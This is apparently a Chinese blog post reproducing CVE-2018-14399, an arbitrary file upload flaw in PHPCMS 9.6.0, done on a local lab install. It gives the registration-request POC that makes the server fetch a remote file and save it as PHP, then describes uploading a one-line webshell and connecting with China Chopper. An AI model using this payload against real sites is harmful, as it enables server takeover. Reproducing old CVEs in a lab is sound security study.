mysql文件上传漏洞_phpcms v9.6.0任意文件上传漏洞(CVE-2018-14399)

最新推荐文章于 2024-05-16 03:06:11 发布
最新推荐文章于 2024-05-16 03:06:11 发布
阅读量221 收藏
点赞数
文章标签: mysql文件上传漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39887926/article/details/114874649
版权

phpcms v9.6.0任意文件上传漏洞(CVE-2018-14399)

一、漏洞描述

PHPCMS 9.6.0版本中的libs/classes/attachment.class.php文件存在漏洞,该漏洞源于PHPCMS程序在下载远程/本地文件时没有对文件的类型做正确的校验。远程攻击者可以利用该漏洞上传并执行任意的PHP代码。

二、漏洞影响版本

PHPCMS 9.6.0

三、漏洞环境搭建

2、 解压下载的文件,然后把文件放到phpstudy的网站根目录下,浏览器访问192.168.10.171/phpcms/install/install.php,开始安装

b9b855ab4e7aed780cb2fe53df025bfa.png

3、一直点击下一步,在”选择模块”这个环节,选择”全新安装PHPCMS V9”

feb69bf3960a364b86e9735a34b71951.png

4、然后一直下一步,在”账号设置”这一块填写数据库账号和密码以及设置管理员密码

786423a8562c784245fe2a14e7de47b4.png

5、然后一直下一步,直到出现如下界面,说面成功安装

51825c364c171a9a3d1de53a69a86de9.png

6、登录后台,生成首页

0a74cdab74af5aa384b58b92d86b3d72.png

四、漏洞复现

1、浏览器访问前台,注册一个会员

d37ee2a770482ff4aa3012af53705381.png

2、点击注册页面,抓包

2fdf349480cf0c612778e3d5c098db25.png

3、在另一个系统(kali),开启web服务,然后在web根目录下创建一个txt文件,写入如下信息

1fa0514a2bc5bf5f9422caa698471979.png

4、构造POC

siteid=1&modelid=11&username=test2&password=test2123&email=test2@163.com&info[content]=phpinfo.txt?.php#.jpg&dosubmit=1&protocol=

5、修改抓包内容,添加POC

6d585b3c45f6682d8b5b724ef28ef7e5.png

6、可以看到返回包的内容包含了上传文件的路径

84123d08439428a1fdc87de30356d8ed.png

7、浏览器访问

a8e704865a0aac61f024a3c28c002765.png

8、构造POC,上传一句话

POC内容:

siteid=1&modelid=11&username=testa&password=testa123&email=testa@163.com&info[content]=test.txt?.php#.jpg&dosubmit=1&protocol=

9、修改数据包,添加POC,需要注意: 在repeater里测试go时每一次都要修改username,password和email字段值,保证不能重复。

5087b4f8048d96f39222f13ee6c56512.png

10、可以看到返回包的内容包含了上传文件的路径

87a379b63f5e9ab4b55ede4ec0d0e234.png

11、菜刀连接

3af921cfffd03da65067517b8eaca680.png

weixin_39887926
关注
反序列化复现CVE-2016-7124 AND phpcms v9.6.0任意文件上传漏洞 CVE-2018-14399
qq_43400414的博客
12-03 551
反序列化复现CVE-2016-7124 这里以一道CTF题目为例子 可以看见在sercet类中所存在的三个方法都是魔法函数,具体含义已在注释中写明 可以看出来我们需要传入一个变量为val,然后通过destructd函数输出得到我们flag.php,但是由于存在wakeup函数,导致我们反序列化后的$file始终为index.php,所以我们就需要绕过wakeup函数,使他不执行。 我们先看一看正常情况下,这段代码输出的序列化对象。 O:6:"sercet":1:{s:12:"s..
phpcms v9.6.0任意文件上传漏洞复现与原理分析(CVE-2018-14399)
不想当脚本小子的脚本小子
12-26 2936
一、漏洞描述 PHPCMS 9.6.0版本中的libs/classes/attachment.class.php文件存在漏洞,该漏洞源于PHPCMS程序在下载远程/本地文件时没有对文件的类型做正确的校验。远程攻击者可以利用该漏洞上传并执行任意的PHP代码。 二、漏洞影响版本 PHPCMS 9.6.0 三、漏洞环境搭建 1.解压下载的文件,然后把文件放到phpstudy的网站根目录下,浏览器访问127.0.0.1/phpcms/install/install.php,开始安装 在创..
phpcms attachment.class.php,phpcms9.6.0任意文件上传漏洞CVE-2018-14399
weixin_42533243的博客
03-22 357
0x00:前言PHPCMS 9.6.0版本中的libs/classes/attachment.class.php文件存在漏洞,该漏洞源于PHPCMS程序在下载远程/本地文件时没有对文件的类型做正确的校验。远程攻击者可以利用该漏洞上传并执行任意的PHP代码。可以直接前台getshell。phpcms 9.6.00x01:漏洞测试1.1 浏览器访问前台注册会员1.2 点击注册按钮,用burp抓包发送到...
phpcms v9.6.0任意文件上传漏洞(CVE-2018-14399)
AgonYAN的博客
07-25 3121
phpcms v9.6.0任意文件上传漏洞(CVE-2018-14399)
phpcms get mysql_合集phpcms安全漏洞
weixin_32803887的博客
01-28 207
phpcms教程介绍常见的phpcms安全漏洞1、宽字节注入漏洞/phpcms/modules/pay/respond.php 位置约16行原来代码$payment = $this->get_by_code($_GET['code']);替换为$payment = $this->get_by_code(mysql_real_escape_string($_GET['code']));2...
phpcmsv9.0任意文件上传漏洞解析
01-19
POST /phpcms_v9.6.0_UTF8/install_package/index.php?m=member&c=index&a=register&siteid=1 HTTP/1.1 Host: 192.168.0.109 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Fire...
phpcmsv9文件上传功能_UTF8_phpcmsv9文件上传功能_UTF8_piledqq_源码
10-04
PHPcmsV9文件上传功能详解》 PHPcmsV9是一款基于PHP+MySQL开发的内容管理系统,它在网站建设和管理中提供了丰富的功能,其中单文件上传功能是其重要的组成部分之一。这一功能允许用户通过Web界面方便地上传各种...
phpcms v9.6.0版本
09-09
phpcms v9.6.0版本】是一个重要的里程碑,它是phpcms内容管理系统的一个特定发行版,具有特定的安全性和功能特性。此版本被保留下来,主要是为了研究和学习目的,尤其是针对其中已知的安全问题——前台getshell...
phpcms_V9任意文件上传poc
soldier_wing的博客
06-30 1479
使用方法:先编译 javac -encoding UTF-8 Main.java 然后运行 java Main URL(http://www.xxxx.com) import java.io.BufferedReader; import java.io.IOException; import java.io.InputStreamReader; import java.io.OutputStream
传感与检测技术,Pt100热电阻测温实验报告,江南大学物联网(1)
最新发布
2401_85015014的博客
05-16 619
/返回 x 的系数 k 公式:k = (n sum( xy ) - sum( x ) sum( y )) / (n sum( x^2 )-sum(x) ^ 2)System.out.println(“非线性误差为:” + Math.abs(maxy/fully*100) + “%”);//返回常量系数系数 b 公式:b = sum( y ) / n - k * sum( x ) / n。System.out.println(“灵敏度为:” + Math.abs(s));//返回对应项相乘后的和。
PHPcms V9 任意文件上传漏洞
qax
09-04 5901
之前碰到一个站点,存在目录遍历,看到upload目录下上传了好多php的大马,说明这网站肯定是有漏洞的,看了一下网站指纹,是phpcms的,正好借此网站复现一下此漏洞 一丶漏洞简介 此漏洞爆出来的时间是2017年4月份左右,时间比较长了,存在任意文件长传,漏洞利用比较简单,危害很大,可以直接前台getshell。 二丶影响版本 phpcms v9.6.0 三丶漏洞分析 漏洞利用点是注册的地方,我们来看一下网上常用的一个payload: http://127.0.0.1/index.php.
php任意文件上传代码_php 文件上传实例代码
weixin_29188043的博客
03-09 230
项目结构:上传首页:上传效果:fileupload.phpname="uploadfile">上传文件://print_r($_FILES["upfile"]);if(is_uploaded_file($_FILES['upfile']['tmp_name'])){$upfile=$_FILES["upfile"];//获取数组里面的值$name=$upfile["name"];//上传文件...
upload.php漏洞,ProjectPier 'upload.php'任意文件上传漏洞
weixin_36219784的博客
03-23 105
发布日期:2012-10-03更新日期:2012-10-16受影响系统:ProjectPier ProjectPier描述:--------------------------------------------------------------------------------BUGTRAQ ID: 55758ProjectPier是一款开源的项目管理程序,基于PHP+MySQL架构。Pr...
1-PHP代码审计——PHPCMSV9.2上传文件漏洞
网络安全
03-30 928
漏洞复现环境: chrome浏览器安装xdebug phpstrom开发工具 wamp php-5.4.45 phpcms9.2 测试环境网址为www.test.com,环境搭建好后,在浏览器地址栏输入网址http://www.test.com/install安装phpcms9.2 默认都是下一步安装,到账号设置这一步需要设置数据库和cms管理后台的账户,根据自己本地环境设置就好。然后下一步,等待安装完成。 漏洞复现 访问首页注册一个用户: 注册...
phpcms上传php文件,phpcms v9 表单添加文件上传字段单个文件上传功能
weixin_39669147的博客
03-10 548
phpcms v9提供了强大的模型管理功能,可以自定义字段,更符合自己的业务逻辑,那么如何二开一个单文件上传功能呢,跟着我一步一步操作,实现你需求的业务逻辑。第一步 添加模型添加字段类型选项在模型添加字段的配置文件目录./phpcms/modules/content/fields/fields.class.php 约 23行 位置,插入一行'file'=>'文件上传',第二步 先复制一份...
phpcms attachment.class.php路径,2019-11-9:phpcms v9.6.0任意文件上传漏洞(CVE-2018-14399)
weixin_29098367的博客
04-08 257
一,下载安装phpcmsv966.01,下载官方下载phpcms v9.6.0版本,下载地址:http://download.phpcms.cn/v9/9.6/下载之后,将源码都解压到phpstudy的www目录,浏览器访问源码中的install目录,一步步安装2,打开后台管理,进入后台,后台账号密码为之前安装时候设置的账号密码二、漏洞复现1,查询资料可知,任意文件上传漏洞出现在,PHPCMS ...
phpcms v9.任意文件上传漏洞复现
newlife1441的博客
08-15 4638
如果你也出现上面的情况请试试下面说的方法:这里有一个小坑注意,你在压缩前面的文件时要注意他们在压缩文件中的顺序,意思就是你创建的一个php文件在创建的txt文件的上面就可以成功,只有这样在解压失败后它还是能够保留并将php文件成功解压出来。时间竞争漏洞利用原理其实就是在解压文件后与删除限制的文件之间的时间空隙来利用提前在限制的文件中写好的利用代码在非解压目录下生成新的不会被删除的新文件(木马),通过这个木马来拿下网站。原理:这里我们通过利用解压文件在解压过程出错会导致后面的递归删除操作不会执行的特点。...
PHPCMSv9.6.0前端任意文件上传漏洞分析
红队是青春
01-29 853
PHPCMSv9.6.0前端任意文件上传漏洞代码分析
phpCMS阿里安全漏洞修复教程与补丁应用
这些漏洞包括宽字节注入漏洞phpcms注入漏洞以及前台注入导致的任意文件读取漏洞。以下是针对这些漏洞的详细修复方法: 1. **宽字节注入漏洞修复**: 发现于`/phpcms/modules/pay/respond.php`,大约第16行的代码...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值